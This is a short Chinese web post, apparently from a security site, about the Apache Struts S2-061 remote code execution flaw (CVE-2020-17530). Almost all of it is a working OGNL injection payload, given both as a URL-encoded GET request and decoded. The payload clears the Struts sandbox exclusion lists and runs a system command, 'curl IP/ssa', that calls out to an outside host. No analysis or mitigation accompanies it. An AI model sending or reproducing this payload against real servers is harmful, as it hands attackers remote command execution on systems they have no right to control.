WILD-S2-061 Struts远程代码执行漏洞(CVE-2020-17530)

lufei 112 次浏览 0
"GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+IP%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.0"

解码URL

{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl ip/ssa'}).(#res=#exec.exec(#cmd))}

发表评论 取消回复
表情